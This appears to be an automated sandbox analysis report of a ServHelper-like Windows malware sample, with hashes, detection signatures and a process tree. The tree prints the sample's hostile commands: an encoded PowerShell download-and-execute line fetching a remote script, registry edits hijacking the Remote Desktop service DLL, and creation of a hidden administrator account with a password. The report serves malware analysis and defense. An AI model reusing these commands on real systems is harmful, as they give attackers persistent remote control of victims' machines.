Analysis
max time kernel: 89s
max time network: 152s
platform: windows10_x64
resource: win10v20210408
submitted: 22-09-2021 07:10
Static task: static1
Behavioral task: behavioral1
  Sample: 61d5e32562d1c70daf0a3112f7888258.exe
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: 61d5e32562d1c70daf0a3112f7888258.exe
  Resource: win10v20210408
General
Target: 61d5e32562d1c70daf0a3112f7888258.exe
Size: 5.7MB
MD5: 61d5e32562d1c70daf0a3112f7888258
SHA1: 11c54ce99e87637f58c7bc0bd8134c73df9bf879
SHA256: da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605
SHA512: 9cad97c4c71535a2391ad73d13e27748300e3147a3383d4eee85caadb461815f9ee8e9b172e732df16813fa8f5ffdc7115e2740778ebc51c536ab06fc7910cc2
Malware Config
Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- suricata: ET MALWARE ServHelper CnC Inital Checkin
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes (flow / pid / process):
  4  4184 powershell.exe
  8  4184 powershell.exe
  9  4184 powershell.exe
  10 4184 powershell.exe
  12 4184 powershell.exe
  14 4184 powershell.exe
  17 4184 powershell.exe
  19 4184 powershell.exe
  21 4184 powershell.exe
- Modifies RDP port number used by Windows (1 TTP)
- Sets DLL path for service in the registry (2 TTPs)
- YARA matches (resource / yara_rule):
  \Windows\Branding\mediasrv.png  upx
  \Windows\Branding\mediasvc.png  upx
- Loads dropped DLL (2 IoCs)
  Processes (pid / process):
  4004
  4004
- Drops file in Program Files directory (4 IoCs)
  Processes (description / ioc / process):
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT      powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI      powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI  powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes (description / ioc / process):
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID7BD.tmp  powershell.exe
  File opened for modification  C:\Windows\branding\mediasvc.png  powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_dcjatqss.2le.ps1  powershell.exe
  File opened for modification  C:\Windows\branding\Basebrd  powershell.exe
  File opened for modification  C:\Windows\branding\mediasrv.png  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID87C.tmp  powershell.exe
  File created                  C:\Windows\branding\mediasrv.png  powershell.exe
  File created                  C:\Windows\branding\mediasvc.png  powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_di5i12c1.sp3.psm1  powershell.exe
  File created                  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID86B.tmp  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID87D.tmp  powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  powershell.exe
  File opened for modification  C:\Windows\branding\ShellBrd  powershell.exe
  File opened for modification  C:\Windows\branding\wupsvc.jpg  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat  powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
  File created                  C:\Windows\branding\wupsvc.jpg  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID85A.tmp  powershell.exe
- Modifies data under HKEY_USERS (64 IoCs)
  Processes: powershell.exe, WMIC.exe (registry keys created and values set under \REGISTRY\USER\S-1-5-20)
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes (description / flow / ioc):
  HTTP User-Agent header  12  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  8   Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  9   Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  10  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes (pid / process):
  4756 powershell.exe
  4756 powershell.exe
  4756 powershell.exe
  5056 powershell.exe
  5056 powershell.exe
  5056 powershell.exe
  4280 powershell.exe
  4280 powershell.exe
  4280 powershell.exe
  64   powershell.exe
  64   powershell.exe
  64   powershell.exe
  4756 powershell.exe
  4756 powershell.exe
  4756 powershell.exe
  4184 powershell.exe
  4184 powershell.exe
  4184 powershell.exe
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes (pid / process):
  616
  616
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: powershell.exe (PIDs 4756, 5056, 4280, 64); privileges enabled include SeDebugPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeBackupPrivilege and SeRestorePrivilege
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: 61d5e32562d1c70daf0a3112f7888258.exe, powershell.exe, csc.exe, net.exe, cmd.exe (parent/child pairs are shown in the process tree below)
Processes
61d5e32562d1c70daf0a3112f7888258.exe (PID 4648)
  path: C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe
  cmd:  "C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"
  - Suspicious use of WriteProcessMemory
  powershell.exe (PID 4756)
    path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd:  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    csc.exe (PID 4924)
      path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      cmd:  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4uxgtjmy\4uxgtjmy.cmdline"
      - Suspicious use of WriteProcessMemory
      cvtres.exe (PID 4956)
        path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        cmd:  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7692.tmp" "c:\Users\Admin\AppData\Local\Temp\4uxgtjmy\CSC44318BFD60CB49CF9B55EE690A69664.TMP"
    powershell.exe (PID 5056)
      path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    powershell.exe (PID 4280)
      path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    powershell.exe (PID 64)
      path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    reg.exe (PID 3852)
      path: C:\Windows\system32\reg.exe
      cmd:  "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      (0x1C21 is decimal 7201; the RDP listener is moved off the default TCP 3389)
    reg.exe (PID 4040)
      path: C:\Windows\system32\reg.exe
      cmd:  "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      - Modifies registry key
    reg.exe (PID 4072)
      path: C:\Windows\system32\reg.exe
      cmd:  "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    net.exe (PID 4424)
      path: C:\Windows\system32\net.exe
      cmd:  "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - Suspicious use of WriteProcessMemory
      net1.exe (PID 4444)
        path: C:\Windows\system32\net1.exe
        cmd:  C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    cmd.exe (PID 1648)
      path: C:\Windows\system32\cmd.exe
      cmd:  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      - Suspicious use of WriteProcessMemory
      cmd.exe (PID 2892)
        path: C:\Windows\system32\cmd.exe
        cmd:  cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
        net.exe (PID 4588)
          path: C:\Windows\system32\net.exe
          cmd:  net start rdpdr
          - Suspicious use of WriteProcessMemory
          net1.exe (PID 4596)
            path: C:\Windows\system32\net1.exe
            cmd:  C:\Windows\system32\net1 start rdpdr
    cmd.exe (PID 4240)
      path: C:\Windows\system32\cmd.exe
      cmd:  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - Suspicious use of WriteProcessMemory
      cmd.exe (PID 4576)
        path: C:\Windows\system32\cmd.exe
        cmd:  cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
        net.exe (PID 4568)
          path: C:\Windows\system32\net.exe
          cmd:  net start TermService
          - Suspicious use of WriteProcessMemory
          net1.exe (PID 4704)
            path: C:\Windows\system32\net1.exe
            cmd:  C:\Windows\system32\net1 start TermService
    cmd.exe (PID 3600)
      path: C:\Windows\system32\cmd.exe
      cmd:  "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    cmd.exe (PID 3676)
      path: C:\Windows\system32\cmd.exe
      cmd:  "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
cmd.exe (PID 4856)
  path: C:\Windows\System32\cmd.exe
  cmd:  cmd /C net.exe user WgaUtilAcc 000000 /del
  - Suspicious use of WriteProcessMemory
  net.exe (PID 4920)
    path: C:\Windows\system32\net.exe
    cmd:  net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory
    net1.exe (PID 4948)
      path: C:\Windows\system32\net1.exe
      cmd:  C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
cmd.exe (PID 4968)
  path: C:\Windows\System32\cmd.exe
  cmd:  cmd /C net.exe user WgaUtilAcc TkxJONhF /add
  - Suspicious use of WriteProcessMemory
  net.exe (PID 4996)
    path: C:\Windows\system32\net.exe
    cmd:  net.exe user WgaUtilAcc TkxJONhF /add
    - Suspicious use of WriteProcessMemory
    net1.exe (PID 5016)
      path: C:\Windows\system32\net1.exe
      cmd:  C:\Windows\system32\net1 user WgaUtilAcc TkxJONhF /add
cmd.exe (PID 5032)
  path: C:\Windows\System32\cmd.exe
  cmd:  cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
  net.exe (PID 4100)
    path: C:\Windows\system32\net.exe
    cmd:  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
    net1.exe (PID 3912)
      path: C:\Windows\system32\net1.exe
      cmd:  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
cmd.exe (PID 2036)
  path: C:\Windows\System32\cmd.exe
  cmd:  cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  - Suspicious use of WriteProcessMemory
  net.exe (PID 3560)
    path: C:\Windows\system32\net.exe
    cmd:  net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    - Suspicious use of WriteProcessMemory
    net1.exe (PID 3364)
      path: C:\Windows\system32\net1.exe
      cmd:  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
cmd.exe (PID 3596)
  path: C:\Windows\System32\cmd.exe
  cmd:  cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
  net.exe (PID 3040)
    path: C:\Windows\system32\net.exe
    cmd:  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
    net1.exe (PID 4252)
      path: C:\Windows\system32\net1.exe
      cmd:  C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
cmd.exe (PID 5096)
  path: C:\Windows\System32\cmd.exe
  cmd:  cmd /C net.exe user WgaUtilAcc TkxJONhF
  - Suspicious use of WriteProcessMemory
  net.exe (PID 4128)
    path: C:\Windows\system32\net.exe
    cmd:  net.exe user WgaUtilAcc TkxJONhF
    - Suspicious use of WriteProcessMemory
    net1.exe (PID 2232)
      path: C:\Windows\system32\net1.exe
      cmd:  C:\Windows\system32\net1 user WgaUtilAcc TkxJONhF
cmd.exe (PID 3236)
  path: C:\Windows\System32\cmd.exe
  cmd:  cmd.exe /C wmic path win32_VideoController get name
  - Suspicious use of WriteProcessMemory
  WMIC.exe (PID 4264)
    path: C:\Windows\System32\Wbem\WMIC.exe
    cmd:  wmic path win32_VideoController get name
    - Modifies data under HKEY_USERS
cmd.exe (PID 3216)
  path: C:\Windows\System32\cmd.exe
  cmd:  cmd.exe /C wmic CPU get NAME
  WMIC.exe (PID 668)
    path: C:\Windows\System32\Wbem\WMIC.exe
    cmd:  wmic CPU get NAME
cmd.exe (PID 4084)
  path: C:\Windows\System32\cmd.exe
  cmd:  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  (the -enc argument is UTF-16LE base64 for: IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the URL listed under Malware Config)
  cmd.exe (PID 4036)
    path: C:\Windows\system32\cmd.exe
    cmd:  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    powershell.exe (PID 4184)
      path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Blocklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
Downloads